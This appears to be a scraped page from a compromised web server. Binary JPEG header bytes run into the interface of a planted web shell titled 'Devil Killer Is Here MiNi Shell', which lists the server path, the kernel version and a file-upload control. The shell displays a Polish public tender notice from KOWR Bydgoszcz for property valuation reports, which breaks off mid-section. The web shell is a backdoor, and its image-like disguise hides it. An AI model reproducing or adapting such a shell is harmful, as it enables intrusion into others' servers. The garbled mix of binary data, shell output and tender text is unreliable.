JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240516/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240516/0032662901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Sporządzenie operatów szacunkowych na wycenę nieruchomości, będących w Zasobie KOWR OT Bydgoszcz, położonych na terenie województwa kujawsko-pomorskiego – 5 zadań. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Krajowy Ośrodek Wsparcia Rolnictwa</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Oddział Terenowy w Bydgoszczy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 367849538</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Hetmańska 38</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bydgoszcz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">85-039</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne.bydgoszcz@kowr.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.kowr.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - agencja wykonawcza</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarowanie Zasobem Własności Rolnej Skarbu Państwa </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sporządzenie operatów szacunkowych na wycenę nieruchomości, będących w Zasobie KOWR OT Bydgoszcz, położonych na terenie województwa kujawsko-pomorskiego – 5 zadań. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d001f79d-11e4-11ef-9381-e6cc5d6d04e5</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00326629</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-05-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00104026/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Sporządzenie operatów szacunkowych na wycenę nieruchomości będących w Zasobie KOWR OT Bydgoszcz, z uwzględnieniem podziału na części</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://kowr.eb2b.com.pl/open-preview-auction.html/435968 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja w niniejszym postępowaniu, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą odbywa się przy użyciu środków komunikacji elektronicznej, za pośrednictwem platformy zakupowej pod adresem: https://kowr.eb2b.com.pl/open-preview-auction.html/435968<br/>2. Zamawiający może komunikować się z Wykonawcami również za pomocą poczty elektronicznej, e-mail: zamowienia.publiczne.bydgoszcz@kowr.gov.pl, z poniższym zastrzeżeniem:<br/>2.1. Zamawiający dopuszcza możliwość składania dokumentów elektronicznych lub elektronicznych kopii dokumentów lub oświadczeń za pomocą poczty elektronicznej na wskazany w pkt 2 adres mailowy – Z WYŁĄCZENIEM OFERT WRAZ Z ZAŁACZNIKAMI, KTÓRE SĄ SKŁADANE TYLKO I WYŁĄCZNIE ZA POŚREDNICTWEM PLATFORMY ZAKUPOWEJ <br/>https://kowr.eb2b.com.pl/open-preview-auction.html/435968</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">WYMAGANIA TECHNICZNE I ORGANIZACYJNE<br/>1.	Ofertę sporządza się w języku polskim i składa pod rygorem nieważności, w formie elektronicznej lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. <br/>2.	Do podpisywania dokumentów w postaci elektronicznej wymagane jest posiadanie kwalifikowanego podpisu elektronicznego, podpisu osobistego lub podpisu zaufanego. <br/>3.	Do elektronicznego podpisywania dokumentów elektronicznych przy pomocy kwalifikowanego podpisu elektronicznego stosuje się następujące formaty podpisów: XAdES, PAdES, CAdESlubASIC (Zamawiający preferuje stosowanie formatu podpisu PAdES dla plików w formacie .pdf oraz XAdES typ wewnętrzny otaczający dla plików w pozostałych dopuszczalnych formatach). UWAGA !!! W przypadku korzystania z formatu podpisu XAdES typ zewnętrzny należy pamiętać, żeby plik podpisu przekazać Zamawiającemu razem z plikiem podpisywanym.<br/>4.	Do elektronicznego podpisywania dokumentów elektronicznych przy pomocy podpisu osobistego stosuje się następujące formaty podpisów: PAdES.<br/>5.	Dokumenty elektroniczne po podpisaniu przy pomocy profilu zaufanego generowane są w formacie .xml i w takim formacie należy przesyłać je do Zamawiającego. <br/>6.	W przypadku, gdy dokumenty elektroniczne w postępowaniu, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2022 r. poz. 1233 t.j) Wykonawca w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, zgodnie z zapisami w SWZ.<br/>7.	Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia, sporządzone w języku obcym przekazuje się wraz z tłumaczeniem na język polski. <br/>8.	Szczegółowa informacja nt wymagań technicznych i organizacyjnych dotyczących korespondencji elektronicznej zawarta jest w Specyfikacji Warunków Zamówienia</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27.04.2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej jako „RODO”, wszystkie osoby, które ubiegają się o udzielenie zamówienia / złożyły ofertę, Zamawiający informuje, że: <br/>1.	Administrator danych osobowych<br/>Administratorem, czyli podmiotem decydującym o celach i środkach przetwarzania Pani/Pana danych osobowych, jest Krajowy Ośrodek Wsparcia Rolnictwa (zwany dalej KOWR) z siedzibą w Warszawie (01-207) przy ul. Karolkowej 30. Z administratorem może się Pani/Pan skontaktować poprzez adres e-mail: kontakt@kowr.gov.pl lub pisemnie na adres korespondencyjny: Krajowy Ośrodek Wsparcia Rolnictwa, ul. Karolkowa 30, 01-207 Warszawa. <br/>2.	Inspektor Ochrony Danych Osobowych - W KOWR wyznaczono Inspektora Ochrony Danych Osobowych, z którym może się Pani/Pan skontaktować w sprawach ochrony i przetwarzania swoich danych osobowych pod adresem e-mail: iodo@kowr.gov.pl lub pisemnie na adres naszej siedziby, wskazany w ust. 1.<br/>3.	Cele i podstawy prawne przetwarzania danych osobowych<br/>Pani/Pana dane osobowe przetwarzane będą w celach związanym z postępowaniem o udzielenie zamówienia publicznego prowadzonym na podstawie ustawy z dnia 11.09.2019 r. Prawo zamówień publicznych (Dz.U. z 2023 r. poz. 1605, z późn. zm.) (dalej PZP), w celach związanych z realizacją obowiązków administratora jako Zamawiającego, które wynikają z obowiązujących przepisów prawa, w tym przepisów nakładających obowiązek weryfikacji przestrzegania sankcji unijnych uzupełnionych przez sankcje krajowe w związku z wojną w Ukrainie. Pani/Pana dane osobowe przetwarzane będą także w celu realizacji obowiązku prowadzenia ewidencji korespondencji i archiwizacji dokumentacji zgodnie z ustawą z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach (Dz. U. z 2020 r. poz. 164, z późn. zm.). 4.	Odbiorcy danych osobowych - Pani/Pana dane pozyskane w związku z postępowaniem o udzielenie zamówienia publicznego przekazywane będą wszystkim zainteresowanym podmiotom i osobom, gdyż co do zasady postępowanie o udzielenie zamówienia publicznego jest jawne.<br/>Ograniczenie dostępu do Pani/Pana danych, o których mowa wyżej może wystąpić jedynie w szczególnych przypadkach, jeśli jest to uzasadnione ochroną prywatności, zgodnie z art. 18 ust 5 pkt 1 i 2 PZP.<br/>Pani/Pana dane osobowe mogą być udostępniane innym osobom lub podmiotom jeżeli obowiązek taki będzie wynikać z przepisów prawa. Do Pani/Pana danych mogą też mieć dostęp podmioty przetwarzające dane w naszym imieniu, np. podmioty świadczące usługi informatyczne, usługi niszczenia dokumentów, jak również inni administratorzy danych osobowych przetwarzający dane we własnym imieniu, np. podmioty prowadzące działalność pocztową lub kurierską.<br/>5.	Okres przetwarzania danych osobowych - Pani/Pana dane osobowe będą przetwarzane przez okres przewidziany przepisami prawa w tym zakresie, w tym przez okres przechowywania dokumentacji określony w przepisach powszechnych i uregulowaniach wewnętrznych KOWR w zakresie archiwizacji dokumentów, który może zostać przedłużony o okres przedawnienia roszczeń przysługujących KOWR i w stosunku do niego.<br/>Dokumentacja dotycząca postępowania o udzielenie zamówienia publicznego będzie przechowywana, zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, licząc od dnia 1 stycznia roku następnego po dniu zakończenia postępowania, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy. Ciąg dalszy informacji RODO znajduje się w punkcie dotyczącym Informacji dodatkowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">BYD.WOP.260.5.2024.MB</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 1<br/>Sporządzenie operatów szacunkowych na wycenę nieruchomości:<br/>Działka nr 2/4 o powierzchni 12,2717 ha, obręb Chraplewo, gmina Szubin, powiat nakielski. Charakterystyka nieruchomości – nieruchomość rolna, nie zabudowana. Dla ww. nieruchomości prowadzona jest KW nr BY1U/0003250/3. Plan brak. W studium uwarunkowań i kierunków zagospodarowania przestrzennego zatwierdzonego uchwałą XV/132/15 z dnia 5 listopada 2015 r. działka znajduje się w jednostce planistycznej nr 4, dla której wskazuje się następujący profil funkcjonalny o funkcji dominującej: rolniczy (o wysokiej intensywności). Jako funkcję uzupełniającą określa się: mieszkalnictwo, turystykę i ekologię.<br/>Wykonanie – 1 operatu szacunkowego w dwóch egzemplarzach w formie papierowej </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71319000-7 - Usługi biegłych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">POTWIERDZENIE AKTUALNOŚCI OPERATU SZACUNKOWEGO W RAMACH ZAOFEROWANEJ CENY</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">JAKOŚĆ – DOŚWIADCZENIE RZECZOZNAWCY WYKONUJĄCEGO OPERAT</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 2<br/>Sporządzenie operatów szacunkowych na wycenę nieruchomości:<br/>1.	Działka nr 87/1 o powierzchni 0,1000 ha, obręb Wierzchowiska, gmina Rogowo, powiat rypiński. Charakterystyka nieruchomości - Nieruchomość rolna, niezabudowana. Zgodnie ze studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy działka przeznaczona na cele rolne. <br/>2.	Działka nr 126 o powierzchni 0,3500 ha, obręb Puszcza Rządowa, gmina Rogowo, powiat rypiński. Charakterystyka nieruchomości - Nieruchomość rolna, zabudowana pozostałościami budynków gospodarczych. Zgodnie ze studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy działka przeznaczona na cele rolne. Wyceny należy dokonać z rozbiciem wartości na grunt i budynek.<br/>3.	Działka nr 387/4 o powierzchni 0,0300 ha, obręb Wólka, gmina Skępe, powiat lipnowski. Charakterystyka nieruchomości - Nieruchomość rolna, niezabudowana. Zgodnie ze studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy działka przeznaczona <br/>na cele rolne. <br/>4.	Działka nr 141/2 o powierzchni 0,0800 ha, obręb Boguchwała, gmina Skępe, powiat lipnowski. Charakterystyka nieruchomości - Nieruchomość rolna, niezabudowana. Zgodnie ze studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy działka przeznaczona na cele rolne. <br/>5.	Działka nr 409, 418 o powierzchni 0,6000 ha, obręb Łąkie, gmina Skępe, powiat lipnowski. Charakterystyka nieruchomości - Nieruchomość rolna, niezabudowana, zakrzaczona. Zgodnie ze studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy działka przeznaczona na cele rolne. Wyceny należy dokonać z rozbiciem wartości na poszczególne działki. <br/>6.	Działka nr 423/1, 432/1 o powierzchni 0,7700 ha, obręb Radomice, gmina Lipno, powiat lipnowski. Charakterystyka nieruchomości - Nieruchomość rolna, niezabudowana, zalesiona i zakrzaczona. Zgodnie ze studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy działka przeznaczona na cele rolne. Wyceny należy dokonać z rozbiciem wartości na poszczególne działki oraz wartość gruntu i zadrzewienia. <br/>Wykonanie – 6 operatów szacunkowego w dwóch egzemplarzach w formie papierowej </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71319000-7 - Usługi biegłych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">POTWIERDZENIE AKTUALNOŚCI OPERATU SZACUNKOWEGO W RAMACH ZAOFEROWANEJ CENY</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">JAKOŚĆ – DOŚWIADCZENIE RZECZOZNAWCY WYKONUJĄCEGO OPERAT</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie nr 3<br/>Sporządzenie operatów szacunkowych na wycenę nieruchomości: <br/>1.	Działka nr 73/7, 73/8, 73/9 o powierzchni 0,3408 ha, obręb Bartłomiejowice, gmina Osięciny, powiat radziejowski. Charakterystyka nieruchomości - Nieruchomość rolna, niezabudowana. Zgodnie ze studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy działka przeznaczona na cele rolne. Wyceny należy dokonać z rozbiciem wartości na poszczególne działki. <br/>2.	Działka nr 237/5 o powierzchni 0,0300 ha, obręb Paniewo, gmina Topólka, powiat radziejowski. Charakterystyka nieruchomości - Nieruchomość rolna, niezabudowana. Zgodnie ze studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy działka przeznaczona na cele rolne. <br/>3.	Działka nr 29/4, 29/5 o powierzchni 0,1700 ha, obręb Stary Witoszyn, gmina Fabianki, powiat włocławski. Charakterystyka nieruchomości: nieruchomość nierolna, zabudowana budynkiem mieszkalnym jednorodzinnym oraz budynkiem gospodarczym. Zgodnie ze studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy działka przeznaczona na cele zabudowy mieszkaniowej. Wyceny należy dokonać z rozbiciem wartości na grunt i budynek. Przedmiot wyceny obejmuje również sporządzenie świadectwa charakterystyki energetycznej. <br/>4.	Działka nr 48/38 o powierzchni 0,1818 ha, obręb Kaliska, gmina Lubień Kujawski, powiat włocławski. Charakterystyka nieruchomości - Nieruchomość nierolna, zabudowana budynkiem mieszkalnym jednorodzinnym oraz budynkiem gospodarczym. Zgodnie ze studium uwarunkowań i kierunków zagospodarowania przestrzennego gminy działka przeznaczona na cele zabudowy mieszkaniowej. Wyceny należy dokonać z rozbiciem wartości na grunt i budynek. Przedmiot wyceny obejmuje również sporządzenie świadectwa charakterystyki energetycznej. Wyceny należy dokonać z rozbiciem wartości na poszczególne działki. <br/>Wykonanie – 4 operatów szacunkowego w dwóch egzemplarzach w formie papierowej </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71319000-7 - Usługi biegłych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: 